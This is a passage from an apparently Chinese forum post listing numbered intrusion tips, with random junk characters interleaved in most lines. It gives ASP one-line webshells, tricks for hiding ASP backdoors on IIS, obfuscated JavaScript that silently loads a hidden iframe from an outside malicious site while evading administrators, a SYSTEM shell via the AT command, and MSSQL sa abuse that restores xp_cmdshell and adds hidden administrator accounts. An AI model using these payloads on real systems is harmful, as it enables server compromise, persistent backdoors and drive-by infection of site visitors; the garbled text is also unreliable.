  H* C) D" Q6 N4 Zd).<script language=VBScript runat=server>execute request("sb")</Script>& r7 j3 t4 y; C$ U* w$ O
e).<%25Execute(request("l"))%25># d3 n/ m+ }  F# Y) K* l' A
f).<%if request("cmd")<>"" then execute request("pass")%>
9 v/ l1 h) ]% S
. A8 I( d+ {& I/ ^) x4 p52、at "12:17" /interactive cmd0 }# o/ s4 U' _% Q) M& w' N
执行后可以用AT命令查看新加的任务  p6 D, q1 B5 g& ~' K7 M
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: ^9 \: [7 W5 p3 Q" e
7 X1 j0 S" b' z& n
53、隐藏ASP后门的两种方法: I6 V; c! o7 g, W; k: |) H
1、建立非标准目录:mkdir images..\
6 o8 I0 M5 W$ B' r0 D, W* I4 s拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp7 {, [" ^. T3 d9 d& j, A6 t$ B
通过web访问ASP木马:http://ip/images../news.asp?action=login0 a& @2 w/ o$ _+ s, m
如何删除非标准目录:rmdir images..\ /s
' B- ?$ I3 d" \; ~2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:  _9 [* _: u( J, q
mkdir programme.asp
) a/ ?3 B' g3 f, f新建1.txt文件内容:<!--#include file=”12.jpg”-->% z& E& ?" h3 b( `& f
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
/ V  G& U! b! N3 P+ r7 X1 d, ?attrib +H +S programme.asp
: G7 O- z+ ]$ U4 w3 m通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt1 p+ Y% S  R, j- A" b/ ]) h, ~

' s2 {5 n( j7 f& ]) l54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 _' [9 u/ F0 ]* H: h然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
3 u' B( {5 j# A0 b- W8 ~  G5 V& [; y8 Z" j2 N: e% `" p3 t+ B& P
55、JS隐蔽挂马4 c+ G& k# g8 A: I4 p( h
1.
  N. d. N2 o" H0 A, Cvar tr4c3="<iframe src=ht";
9 d$ U* @1 ~/ j  K# r4 Q( D/ ~tr4c3 = tr4c3+"tp:/";' a- G( }. }9 X$ M
tr4c3 = tr4c3+"/ww";
3 k+ X8 ~3 Q/ G! ^+ Otr4c3 = tr4c3+"w.tr4";" T4 m% B  H! \" c. d) g1 D3 m7 w
tr4c3 = tr4c3+"c3.com/inc/m";
3 y) s/ c9 C' Z/ ]$ V* W- Ptr4c3 = tr4c3+"m.htm style="display:none"></i";2 q4 g) `# h; D8 R
tr4c3 =tr4c3+"frame>'";
+ w) h) H* K* I& mdocument.write(tr4c3);; ~% R5 y0 ]) h5 x/ a& v9 A. g4 C' A
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
" l+ P! K4 Y9 d7 Y& C# P) U" H4 ]' `" r4 y, m0 B
2.
' i! q8 O* ?: `! I" }+ ]6 t1 N/ ^转换进制,然后用EVAL执行。如
3 x% w% O: P$ a2 B! q0 Eeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
! a" I; h( }( J: ?" q8 x不过这个有点显眼。
$ ?3 Q$ \( _9 b7 K$ Z3.5 D) [$ D& ~. x6 N" }9 E+ v1 U( K
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
" t) O: c( Y! t. ]3 Y, @+ ^最后一点,别忘了把文件的时间也修改下。9 c$ B% Z+ C# `; V. t+ x! K4 c- V
" k& z  f1 |" }- o* K1 s4 W# y# e
56.3389终端入侵常用DOS命令1 M( B4 D7 j9 F& l* ?
taskkill taskkill /PID 1248 /t: `4 O$ O7 t' o. l

# [6 q9 n+ @2 N% o# g* g" htasklist 查进程" ~0 r2 z8 c. A
( w( `7 ?  `6 x: F& A0 k; b
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; t; C; G9 O7 P5 r: f( I( kiisreset /reboot
0 P. C4 H- y6 S/ h/ ]tsshutdn /reboot /delay:1    重起服务器8 o# c; c% b0 m0 s

) o2 i3 y( C, P0 x7 Tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,8 C  M4 h# G, d* _8 b% V& W7 p
) x8 F$ F+ C! }2 I$ f6 ?: {
query user 查看当前终端用户在线情况
( a8 A( H; ?4 y7 f1 n; U
$ j. ]1 A+ Y2 x( G' v4 q要显示有关所有会话使用的进程的信息,请键入:query process *! C( B+ a4 y& d& r

, ^; R! ~; N/ ]; o: ~9 Y) f要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
6 T( K. j6 M" \+ D! m4 N' u9 q- n1 n5 R
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2; O; c2 y' p- I0 M0 [& H! z
1 t5 Z9 {+ H3 M; N/ b9 t
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
  B! D! c+ }; _1 D+ S8 W; {
% q5 B& I/ x1 J命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ ~8 l+ w0 q. b* \7 S& ]
& f  @* G2 _$ j% O, V4 p
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
! F9 U6 I4 Z% ?  \2 s1 h9 V$ [
* h) o# e0 G2 D4 U, N命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。3 h8 J  A7 r6 T6 Z: o0 i6 J
+ g- @+ a0 ]; t; Z; ]
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 D7 q! ?, I7 c" ?) K! l" F, K: [8 p

: }, G2 B7 {2 L, }56、在地址栏或按Ctrl+O,输入:! A2 V- S: q: q
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;3 P8 j% ^% B! `/ d. O0 {
  z& A  d) l) U* c( u
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
+ A0 ]7 Y9 x& c# P: _7 c9 X+ i1 d) ^5 ]3 J+ u. v5 c- z
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
6 ?" [: y6 ], l8 M; m! x$ f) G用net localgroup administrators是可以看到管理组下,加了$的用户的。9 `; o; k, v; z* ?; L' _6 }5 @
& I% }* s, M% A/ Y1 X) |& k
58、 sa弱口令相关命令
- i* r5 T( {) f! s4 q+ u
/ H8 b  }; A% n一.更改sa口令方法:
3 k* ^; w0 I; O" a! C* Q2 j用sql综合利用工具连接后,执行命令:+ S$ S8 W# _) I( w
exec sp_password NULL,'20001001','sa'
: h  X4 z# `/ E(提示:慎用!)5 a2 D7 Z- q# f1 ?( J

0 r) D7 D  _" P6 ?6 C. }7 g& C二.简单修补sa弱口令., M  R" ~- Z2 E' k
7 s! Y; o7 \7 |: G0 G
方法1:查询分离器连接后执行:
6 }, q- F" G6 s) J  mif exists (select * from
& t5 F# W, n! Ddbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- T4 y9 A5 F1 w! u% A
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& b; X  n) ]* z
$ L2 k. K# p9 b$ O/ y' Dexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 E! x& G( s+ Q( h# a6 R* g- l) a
5 W; c$ g8 x+ z5 u& T: Z; |
GO
3 C: ]- i6 O) j! E! L! F- J- l* J5 [7 f9 b
然后按F5键命令执行完毕
; V, C. ~5 n/ k) H! a7 J0 ^
& W/ o# r! X  A" ]; `' G% b4 c方法2:查询分离器连接后" I& Q7 O1 N! Q6 n  C( C
第一步执行:use master+ F- B! ]1 L; n! ~+ F
第二步执行:sp_dropextendedproc 'xp_cmdshell'
: g( r# g/ H7 O4 B# U然后按F5键命令执行完毕- I8 ]( s" F- a5 i4 R4 N
' m# }% n) l) u! s9 X6 }: D
4 k. B& y  q9 T' D& b- r
三.常见情况恢复执行xp_cmdshell.
. K) I/ W, O0 l& V1 ], R
" N8 ^6 E& c2 x% J& F* ?0 o
! d$ B; K% `5 ~, B* o1 未能找到存储过程'master..xpcmdshell'./ H6 z. ?6 z) f, l$ q; V* n& _
   恢复方法:查询分离器连接后,+ t; Q. P3 [6 l8 u4 I
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 Z- i' @7 Y( B7 z) [( }+ C
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& l5 p  f% y4 x* g: r+ f然后按F5键命令执行完毕
4 u0 f2 p* V- U/ P5 v% ]% P0 c: u
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)0 ?% z/ ?8 Y' C' o
恢复方法:查询分离器连接后,( E) x7 j! S% k
第一步执行:sp_dropextendedproc "xp_cmdshell"
7 g. V! J, P: Y2 `* e第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 }' h7 }4 c/ u; S# {! z然后按F5键命令执行完毕
. N/ K  k( k% M4 M2 @, b" X
, v' i$ z% m* f% k0 x, \3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 K! J6 W* `. Y! g恢复方法:查询分离器连接后,& P1 `" _, K0 t# V; y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'% c5 f, p5 g" [6 [
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
! i1 G, x4 `/ @然后按F5键命令执行完毕
, W" h' R) F) }# j7 t* b/ D* y
* X5 D- w9 U% l8 J/ Q* }6 O, y四.终极方法.
0 c- E2 u. \+ p& i& Z如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:0 L% H1 \( [+ G" i8 P
查询分离器连接后,
- d: T1 W) B0 T! j; V, k$ _2000servser系统:; S  t! h) x+ R. a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 j3 ?- z6 Z7 \2 B; l* B) q9 m5 S

  y# `9 W- t; R% U4 E5 ]0 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 p0 r/ I$ g) ?1 H7 |' v' }# ^9 A8 o! |- ^
xp或2003server系统:2 f# c% j! ?2 B
/ j+ E9 B. [. d9 p" ~( q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
6 ?9 B% p+ L% f/ A
5 S7 b% c9 Q$ h6 o/ J: N7 p* Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'- o: w5 P; I1 G% o' E# t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表